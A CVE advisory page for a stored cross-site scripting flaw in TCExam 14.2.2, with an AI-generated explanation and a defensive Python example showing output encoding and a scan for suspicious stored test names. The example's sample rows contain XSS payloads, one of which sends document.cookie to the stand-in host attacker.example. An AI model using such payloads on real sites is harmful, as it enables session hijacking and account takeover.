CVE-2020-5746
Description
Insufficient output sanitization in TCExam 14.2.2 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by creating a crafted test.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
TCExam 14.2.2 lets an authenticated user with test-creation rights (level 5 or higher) store XSS in a test name; the payload runs in the browser of every user who views the test, including the administrator.
Vulnerability
TCExam 14.2.2 does not output-encode the test name before rendering it. An authenticated user whose level allows creating tests (level 5 or higher) can save a test whose name carries HTML or JavaScript; the string is stored as-is and later rendered unencoded in the browsers of other users who see the test, including administrators.
Exploitation
The attacker must be authenticated to TCExam with a user level of 5 or higher. They create a test whose name contains script or event-handler markup and assign it to the groups that contain the target users. When a member of those groups, including an administrator, logs in and views their test list, the name is rendered without encoding and the payload executes in that session. No interaction beyond normal use of the application is required.
Impact
Successful exploitation gives the attacker arbitrary JavaScript execution in the victim's session (stored cross-site scripting) [1]: session hijacking, actions performed as the victim, and administrative actions if the administrator views the crafted test. Chained with the other issues reported in the same advisory (CSRF, directory traversal), this can lead to complete compromise of the application.
Mitigation
At publication (2020-05-07) TCExam 14.2.2 was vulnerable, no fixed release was available, and the reference gives no workaround [1]. The proper fix is to HTML-encode the test name, and every other user-supplied string, at each point where it is written into a page. Until a fixed version is deployed, limit the number of accounts that can create tests and review stored test names for HTML markup.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- TCExam / TCExam
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient output sanitization of the test name field allows stored cross-site scripting (XSS)."
Attack vector
An authenticated attacker (level 5 or higher) creates a test whose name field contains script tags with malicious JavaScript [1]. The crafted test can be assigned to all groups. When any user assigned to one of those groups logs in and views their tests, the unsanitized test name is rendered in the browser and the injected script executes [1]. The admin user is among the potential victims, and because the payload is stored server-side the XSS is persistent [1].
Affected code
The vulnerability resides in `shared/code/tce_functions_test.php`, in the function `F_testInfoLink($test_id, $link_name = "")`, which is reached with the unsanitized test name through the `F_getUserTests()` call made from `index.php` [1]. The test name is stored unencoded and later written into the page without encoding, allowing HTML/JavaScript injection [1].
What the fix does
The advisory does not include a patch or specific remediation code [1]. The recommended fix is to HTML-encode the test name in `F_testInfoLink()` and at every other location where user-supplied test names are rendered, so that markup in the name is displayed as text rather than interpreted by the browser [1]. Encoding belongs at the output point; stripping tags on input is at best a second layer, since stored names already in the database are not covered by it. Without output encoding the stored XSS remains exploitable.
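The two practical pieces the page asks for, the output encoding that closes the hole and the review of stored test names suggested under Mitigation, as an added example written for this page (not TCExam's own code, which is PHP). It models the unsafe and the hardened link-rendering in Python; `html.escape(quote=True)` encodes the same characters as PHP's `htmlspecialchars(..., ENT_QUOTES)`. The table name `tce_tests`, the `test_id`/`test_name` columns, the `index.php?testid=` link target and the sample rows are all constructed assumptions for illustration.

```python
import html
import re
import sqlite3

# Constructed sample rows; the table and column names are assumptions for this
# example, not a verified copy of TCExam's schema.
SAMPLE_TESTS = [
    (1, "Intro to Networking - Midterm"),
    (2, '<script>document.location="http://attacker.example/?c="+document.cookie</script>'),
    (3, 'Physics <img src=x onerror="alert(document.domain)"> Quiz'),
    (4, "Algebra & Geometry <final>"),  # odd but benign; must survive encoding intact
]

# Heuristic for reviewing stored names: common HTML tags, inline event handlers,
# javascript: URLs. Any angle bracket in a test name deserves a look, but this
# pattern keeps the false-positive rate low for a periodic check.
HTML_SUSPECT = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed|body|a|div|input|style|link|meta)\b"
    r"|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def vulnerable_test_link(test_id, test_name):
    """The unsafe pattern: the stored name is concatenated into HTML unencoded."""
    return f'<a href="index.php?testid={test_id}">{test_name}</a>'


def hardened_test_link(test_id, test_name):
    """Encode for the HTML text context at the point of output.

    html.escape(..., quote=True) turns & < > " ' into entities, the same set as
    PHP htmlspecialchars() with ENT_QUOTES. The id is cast to int so the href
    cannot carry injected attribute text either.
    """
    return f'<a href="index.php?testid={int(test_id)}">{html.escape(test_name, quote=True)}</a>'


def build_sample_db():
    """In-memory stand-in for the tests table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tce_tests (test_id INTEGER PRIMARY KEY, test_name TEXT NOT NULL)")
    conn.executemany("INSERT INTO tce_tests VALUES (?, ?)", SAMPLE_TESTS)
    return conn


def find_suspicious_test_names(conn):
    """Return (test_id, test_name) for stored names that look like markup."""
    rows = conn.execute("SELECT test_id, test_name FROM tce_tests ORDER BY test_id").fetchall()
    return [(tid, name) for tid, name in rows if HTML_SUSPECT.search(name)]


if __name__ == "__main__":
    db = build_sample_db()
    for tid, name in find_suspicious_test_names(db):
        print(f"review test {tid}: {name!r}")
    for tid, name in SAMPLE_TESTS:
        print("unsafe  :", vulnerable_test_link(tid, name))
        print("hardened:", hardened_test_link(tid, name))
```

Run it against a real deployment by replacing `build_sample_db()` with a connection to the TCExam database; the encoding function is the shape of the fix, the scan is the interim check. Note that flagged rows still need a human look: the regex is a triage aid, not a proof of compromise.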
Preconditions
- auth: attacker must be authenticated with a user level of 5 or higher
- input: attacker must have the ability to create or edit tests
- config: the crafted test must be assigned to groups that include the target users
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] https://www.tenable.com/security/research/tra-2020-31 (MITRE x_refsource_MISC)
News mentions
No linked articles in our index yet.